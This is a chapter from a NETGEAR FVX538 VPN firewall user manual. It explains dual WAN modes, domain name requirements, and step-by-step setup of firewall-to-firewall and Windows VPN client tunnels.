Chapter 6 Virtual Private Networking This chapter describes how to use the virtual private networking (VPN) features of the FVX538 VPN firewall. VPN tunnels provide secure, encrypted communications between your local network and a remote network or computer. Tip: When using dual WAN port networks, use the VPN Wizard to configure the basic parameters and them edit the VPN and IKE Policy screens for the various VPN scenarios. Dual WAN Port Systems The dual WAN ports in the FVX538 VPN firewall can be configured for either rollover mode for increased system reliability or load balancing mode for optimum bandwidth efficiency. This WAN mode choice then impacts how the VPN features have to be configured. Rollover vs. Load Balancing Mode Refer to Virtual Private Networks (VPNs) on page B-10 for an overview of the IP addressing requirements for VPN in the two WAN modes. Table 6-1. IP addressing requirements for VPNs in dual WAN port systems Configuration and WAN IP address Rollover Mode * Load Balancing Mode VPN Road Warrior Fixed FQDN required Allowed (FQDN optional) (client-to-gateway) Dynamic FQDN required FQDN required VPN Gateway-to-Gateway Fixed FQDN required Allowed (FQDN optional) Dynamic FQDN required FQDN required VPN Telecommuter Fixed FQDN required Allowed (FQDN optional) (client-to-gateway through a NAT router) Dynamic FQDN required FQDN required *. All tunnels must be re-established after a rollover using the new WAN IP address. Virtual Private Networking 6-1
Figure 6-1shows the setup screens for the selected WAN mode. This setup is accomplished in Step 4: Configure the WAN Mode (Required for Dual WAN) on page 3-8. Rollover Mode Setup Screen Load Balancing Mode Setup Screen Figure 6-1 Fully Qualified Domain Names The use of fully qualified domain names is: Mandatory when the WAN ports are in rollover mode (Figure 6-2 on page 6-3); also required for the VPN tunnels to fail over. Mandatory when the WAN port are in load balancing mode and the IP addresses are dynamic (Figure 6-3 on page 6-4) Optional when the WAN ports are in load balancing mode the IP addresses are static (Figure 6-3 on page 6-4) 6-2 Virtual Private Networking
See Step 5: Configure Dynamic DNS (If Needed) on page 3-11 for how to select and configure the Dynamic DNS service. FVX538 Functional Block Diagram FVX538 Firewall Rest of FVX538 Functions FVX538 WAN Port Functions FVX538 Rollover Control WAN 1 Port WAN 2 Port Internet FQDN required Dynamic DNS screen Same FQDN setup for BOTH WAN ports Select Dynamic DNS service Figure 6-2 Virtual Private Networking 6-3
FVX538 Functional Block Diagram FVX538 Firewall Rest of FVX538 Functions FVX538 WAN Port Functions Load Balancing Control WAN 1 Port WAN 2 Port Internet FQDN required (dynamic IP addresses) FQDN optional (static IP addresses) Dynamic DNS screens FQDN setup for WAN1 port Select Dynamic DNS service FQDN setup for WAN2 port Select Dynamic DNS service Figure 6-3 6-4 Virtual Private Networking
Creating a VPN Connection: Between FVX538 and FVX538 This section describes how to configure a VPN connection between a NETGEAR FVX538 VPN Firewall and a NETGEAR FVS338 VPN Firewall. Using each firewall's VPN Wizard, we will create a set of policies (IKE and VPN) that will allow the two firewalls to connect from locations with fixed IP addresses. Either firewall can initiate the connection. This procedure was developed and tested using: Netgear FVX538 VPN Firewall with version 1.6.11 firmware WAN1 IP address is 10.1.0.118 LAN IP address subnet is 192.168.1.1 255.255.255.0 Netgear FVS338 VPN Firewall with version 1.6.7 firmware WAN IP address is 10.1.1.150 LAN IP address subnet is 192.168.2.1 255.255.255.0 Configuring the FVX538 1. Select the VPN Wizard. 2. Give the client connection a name, such as to_fvs. 3. Enter a value for the pre-shared key. 4. Click Next. 5. Enter the WAN IP address of the remote FVS338. Figure 6-4 Virtual Private Networking 6-5
6. Click WAN1 to bind this connection to the WAN1 port. 7. Click Next. 8. Enter the LAN IP address and subnet mask of the remote FVS338. 9. Click Next. 10. Click Done to create the to_fvs IKE and VPN policies. Figure 6-5 In the IKE Policies menu, the to_fvs IKE policy will appear in the table. Figure 6-6 Figure 6-7 6-6 Virtual Private Networking
11. You can view the IKE parameters by selecting to_fvs and clicking Edit. It should not be necessary to make any changes. Note: When X Authentication is enabled, incoming VPN connections are authenticated against the FVX538 data base first, then, if configured, a RADIUS server is checked. 12. In the VPN Policies menu, the to_fvs VPN policy appears in the table. Figure 6-8 Figure 6-9 Virtual Private Networking 6-7
13. You can view the VPN parameters by selecting to_fvs and clicking Edit. It should not be necessary to make any changes. Figure 6-10 6-8 Virtual Private Networking
14. You can view the IKE parameters by selecting to_fvs and clicking Edit. It should not be necessary to make any changes. Figure 6-11 Configuring the FVS338 1. Select the VPN Wizard 2. Give the client connection a name, such as to_fvx. 3. Enter a value for the pre-shared key. 4. Select 'a remote VPN gateway'. 5. Click Next. Figure 6-12 Virtual Private Networking 6-9
6. Enter the WAN IP address of the remote FVX538. 7. Click Next. 8. Enter the LAN IP address and subnet mask of the remote FVX538. 9. Click Next. 10. Click Done to create the to_fvx IKE and VPN policies. Testing the Connection Figure 6-13 Figure 6-14 1. From a PC on either firewall's LAN, try to ping a PC on the other firewall's LAN. Establishing the VPN connection may take several seconds. 2. For additional status and troubleshooting information, view the VPN log and status menu in the FVX538 or FVS338. Creating a VPN Connection: Netgear VPN Client to FVX538 This section describes how to configure a VPN connection between a Windows PC and the FVX538 VPN firewall. Using the FVX538's VPN Wizard, we will create a single set of policies (IKE and VPN) that will allow up to 50 remote PCs to connect from locations in which their IP addresses are unknown in advance. The PCs may be directly connected to the Internet or may be behind NAT routers. If more PCs are to be connected, an additional policy or policies must be created. Each PC will use Netgear's VPN Client. Since the PC's IP address is assumed to be unknown, the PC must always be the Initiator of the connection. 6-10 Virtual Private Networking
This procedure was developed and tested using: Netgear FVX538 ProSafe VPN Firewall 200 with version 1.6.11 firmware Netgear VPN Client version 10.3.5 (Build 6) NAT router: Netgear FR114P with version 1.5_09 firmware Configuring the FVX538 1. Select the VPN Wizard 2. Give the client connection a name, such as home. 3. Enter a value for the pre-shared key. 4. Select 'a remote VPN client'. Figure 6-15 5. Click Next to go to the summary page. 6. Click Done to create the 'home' IKE and VPN policies. Virtual Private Networking 6-11
Configuring the VPN Client 1. Right-click on the VPN client icon in your Windows toolbar and select the Security Policy Editor. 2. In the upper left of the Policy Editor window, click the New Document icon to open a New Connection. 1. Give the New Connection a name, such as to_fvs. 2. In the Remote Party Identity section, select ID Type of IP Subnet. 3. Enter the LAN IP Subnet Address and Subnet Mask of the FVX538's LAN. 4. Select Connect using Secure Gateway Tunnel. 5. Under ID Type, select Domain Name and Gateway IP Address. Figure 6-16 Figure 6-17 6-12 Virtual Private Networking
6. For Domain Name, enter fvs_local.com and enter the WAN IP Address of the FVX538. 7. In the left frame, click on My Identity. 8. Select Certificate = None. 9. Under ID Type, select Domain Name. Figure 6-18 The value entered under Domain Name will be of the form <name><xy>.fvs_remote.com, where each user must use a different variation on the Domain Name entered here. The <name> is the policy name used in the FVX538 configuration. In this example, it is home. X and Y are an arbitrary pair of numbers chosen for each user. Note: X may not be zero! Virtual Private Networking 6-13
In this example, we have entered home11.fvs_remote.com. Up to 50 user variations can be served by one policy. 10. Leave Virtual Adapter disabled, and select your computer s Network Adapter. Your current IP address will appear 11. Before leaving the My Identity menu, click the Pre-Shared Key button. 12. Click Enter Key, type your preshared key, and click OK. This key will be shared by all users of the FVX538 policy home. Figure 6-19 Figure 6-20 6-14 Virtual Private Networking
13. In the left frame, click on Security Policy. 14. Select Phase 1 Negotiation Mode = Aggressive Mode. PFS should be disabled, and Replay Detection should be enabled. Figure 6-21 15. In the left frame, expand Authentication and select Proposal 1. Compare with the figure to the right. No changes should be necessary. Figure 6-22 Virtual Private Networking 6-15
16. In the left frame, expand Authentication and select Proposal 1. 17. In the left frame, expand Key Exchange and select Proposal 1. Compare with the figure to the right. No changes should be necessary. 18. In the upper left of the window, click the disk icon to save the policy. Testing the Connection Figure 6-23 1. Right-click on the VPN client icon in your Windows toolbar and select Connect..., then My Connections\to_FVS. Within 30 seconds you should receive a message Successfully connected to My Connections\to_FVS and the VPN client icon in the toolbar should say On: 6-16 Virtual Private Networking
2. For additional status and troubleshooting information, right-click on the VPN client icon in your Windows toolbar and select Connection Monitor or Log Viewer, or to view the VPN log and status menu in the FVX538. Figure 6-24 Virtual Private Networking 6-17
6-18 Virtual Private Networking